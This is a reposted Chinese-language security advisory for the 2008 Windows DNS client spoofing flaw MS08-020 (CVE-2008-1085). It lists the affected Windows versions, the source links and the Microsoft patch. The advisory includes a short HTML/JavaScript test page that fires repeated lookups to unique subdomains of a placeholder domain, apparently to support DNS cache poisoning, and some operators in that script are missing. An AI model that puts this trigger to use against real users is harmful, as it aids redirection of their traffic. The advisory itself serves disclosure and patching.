安科网

Microsoft Windows DNS客户端可预测事件处理ID漏洞(MS08-020)

aoumeior

aoumeior

2008-10-07

关注 关注
受影响系统:
Microsoft Windows XP SP2
Microsoft Windows Vista
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1
Microsoft Windows 2000SP4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28553
CVE(CAN) ID: CVE-2008-1085

Microsoft Windows是微软发布的非常流行的操作系统。

Windows DNS客户端服务在执行DNS查询时,随机选择事件处理值没有提供足够的熵。未经认证的攻击者可以向有漏洞客户端的DNS请求返回恶意响应,欺骗或重新定向合法位置的Internet通讯。

<*来源:Amit Klein ([email protected]

链接:http://secunia.com/advisories/29696/
http://marc.info/?l=bugtraq&m=120767868524748&w=2
http://www.trusteer.com/docs/Microsoft_Windows_resolver_DNS_cache_poisoning.pdf
http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA08-099A.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<body>
<script>
var max_n=20;
var n=0;
var x=new Image();
x.onerror=loadnext;
x.onload=loadnext;
function loadnext()
{
if (n<max_n)
{
n ;
x.src="http://t-" (new Date()).getTime()
"-" n ".domain.site/";
}
}
loadnext();
</script>
</body>
</html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS08-020)以及相应补丁:
MS08-020:Vulnerability in DNS Client Could Allow Spoofing (945553)
链接:http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx?pf=true

dns

aoumeior

aoumeior

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

12道腾讯前端面试真题及答案整理

年底了,又到了跳槽季啦,该刷题走起了。这里总结了一些被问到可能会懵逼的面试真题,有需要的可以看下~。DNS 是什么-- Domain Name System,域名系统,作为域名和IP地址相互映射的一个分布式数据库。但a标签的默认启动在HTTPS不起作用。这

localhost0 2020-11-12

什么是 DNS,它是如何工作的?

域名系统是互联网的基础之一,然而大多数不懂网络的人可能并不知道他们每天都在使用它来工作、查看电子邮件或在智能手机上浪费时间。就其本质而言,DNS 是一个与数字匹配的名称目录。这些数字,在这里指的是 IP 地址,计算机用 IP 地址来相互通信。大多数对 DN

jlccwss 2020-09-11

HA(高可用)就像套娃,像胖子,剥掉一层还有一层

目前HTTP协议,乃至WebSocket协议,乃至采用了MQTT协议的WebSocket协议,都不可避免的使用了Nginx。所谓病从口入,祸从口出。作为入口,Nginx承担的责任非常的重要。假如某个时刻不能用了,那可真是灾难。我们通常希望在高可用的时候,同

lwplvx 2020-09-07

Kubernetns LB方案:无需云厂商的动态DNS和负载均衡

本文转载自微信公众号「新钛云服」,作者祝祥 翻译 。我们经常谈论托管Kubernetes或在云中运行的Kubernetes,但我们也在非云的环境上运行Kubernetes。您可能还会听到很多有关云供应商集成的经典案例:您可以获取无密码凭据来访问托管服务,无

YzhilongY 2020-08-31

在Linux上挖掘DNS应答中的秘密

dig 是一个强大而灵活的工具,用于查询域名系统服务器。在这篇文章中,我们将深入了解它的工作原理以及它能告诉你什么。它执行 DNS 查询,并显示参与该过程的名称服务器返回的应答以及与搜索相关的细节。系统管理员和DNS管理员经常使用dig来帮助排除 DNS

KevinXC 2020-08-12

Coredns+Nodelocaldns cache解决Coredns域名解析延迟

目前18.6版本和之前的coredns都会出现超时5s的情况,那么为什么会出现coredns超时的情况发生?在Kubernetes中,Pod访问DNS服务器的最常见方法是通过服务抽象。因此,在尝试解释问题之前,了解服务的工作原理以及因此在Linux内核中如

oLeiShen 2020-08-01

你在浏览器输入一个URL都经历了什么过程

当电脑把一个域名解析完之后,它把这个这个域名和那个主机Ip地址相关联起来了,电脑吧这个关系存到DNS缓存表中,下次电脑再输入www.baidu.com的时候,电脑通过查找DNS缓存,就可以知道这个域名对应的IP地址了,不再进行域名解析了,提高了效率。Ip地

dahege 2020-08-01

linux wget无法解析主机地址

resolv.conf是DNS域名解析的配置文件,它的格式很简单,每行以一个关键字开头,后接配置参数。resolv.conf的关键字主要有四个,分别是:

windzoone 2020-07-29

一文入门DNS?从访问GitHub开始

大家都是做开发的,都有GitHub的账号,在日常使用中肯定会遇到这种情况,在不修改任何配置的情况下,有时可以正常访问GitHub,有时又直接未响应,来一起捋捋到底是为啥。虽然很戳心,但好歹能展示一部分。本地域名解析服务系统:本地域名系统LDNS一般都是本地

travelinrain 2020-07-27

DNS域名解析过程

当在浏览器中输入URL时,DNS解析是怎样的的过程呢?浏览器缓存有大小和时间限制,域名被缓存的时间限制可以通过TTL属性来设置。

leodengzx 2020-07-18

一文搞明白DNS的来龙去脉

到 20 世纪 70 年代末,ARPAnet 是一个拥有几百台主机的很小很友好的网络。仅需要一个名为 HOSTS.TXT 的文件就能容纳所有需要了解的主机信息:它包含了所有连接到 ARPAnet 的主机名字到地址的映射。HOSTS.TXT 文件是由 SR

hxf0 2020-07-10

使用coredns 的template plugin实现一个xip 服务

xip dns 服务在我们的实际开发中,还是挺有用的,我们可以基于dns模式方便的进行软件开发,同时。结合nginx 的虚拟主机,可以实现灵活的软件部署,以下是基于coredns 的template plugin 实现一个。我们基于正则以及templat

oLeiShen 2020-06-25

nginx 代理 coredns dns 服务

今天有写过一个简单的基于nginx 的stream 代理dns server的服务,以下是集成coredns 的一个demo. 同时也包含了consul 以及使用coredns 的rewrite 以及loadbalance 插件。对于dalongrong.

oLeiShen 2020-06-25

基于nginx proxy dns server

原理实际行就是stream模式,因为nginx 支持基于stream 模式的lb同时支持以下是一个简单的配置。有点不太好的,默认的不支持health check,当然我们可以基于openresty 的stream 模块进行扩展,这样就可以更好的利用dns

dahege 2020-06-25

【扫盲】ip、域名、DNS、url之间的关系

我们知道,在Internet上有千百万台主机,为了区分这些主机,人们给每台主机都分配了一个专门的地址,称为IP地址。IP地址由4部分数字组成,每部分都不大于256,各部分之间用小数点分开。我们的每个虚拟主机用户,都分配一个永久的IP地址。虽然可以通过IP地

dahege 2020-06-22

Kubernetes(k8s)安装dns附件组件以及使用

一旦一个service被创建,该service的service ip和service port等信息都可以被注入到pod中供它们使用。kubernetes主要支持两种service发现机制,第一种是环境变量,第二种是DNS。没有dns服务的时候,kuber

MissFuTT 2020-06-21

一文搞懂什么是vlan、三层交换机、网关、DNS、子网掩码、MAC地址

VLAN中文是“虚拟局域网”。LAN可以是由少数几台家用计算机构成的网络,也可以是数以百计的计算机构成的企业网络。VLAN所指的LAN特指使用路由器分割的网络——也就是广播域。听上面的概念,肯定有不少朋友是一头雾水的,什么是虚拟局域网?造成了网络带宽和CP

ationwork 2020-06-16

HTTPS的由来详述,数字证书实现HTTPS

最近看过几篇文章,内容是关于“全民HTTPS”的。为什么HTTPS,突然会受到如此多业内人士的青睐呢?它与HTTP又有怎样的区别呢?带着这个问题,我查看了很多网上的资料,但是太多的专业词汇,让我感到头疼,很难理解。所以,我又耐着性子,参照翟志军的《也许,这

kenson 2020-06-12

Windows Server 2012R2 实现AD双域控制器互为冗余

两台域空互为冗余,通过dns服务实现。dns都装在每台的域控上,A断网,B接管域空;但不知为啥pc端nslookup出来的dns仍旧是A的,或许没有实现切换。

chwzmx 2020-06-09

域名解析-DNS转化

域名,是由一串用点分隔的名字组成的互联网上某台计算机或某组计算机的标识,它的目的是为了方便人们更简单便捷地访问互联网上的服务。在实际的系统实现中,域名通过DNS系统转化为服务器的IP地址,以方便机器通过IP进行寻址和通信。上述行为,我们称之为域名解析。作为

tianchaoshangguo 2020-06-08
aoumeior

aoumeior

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号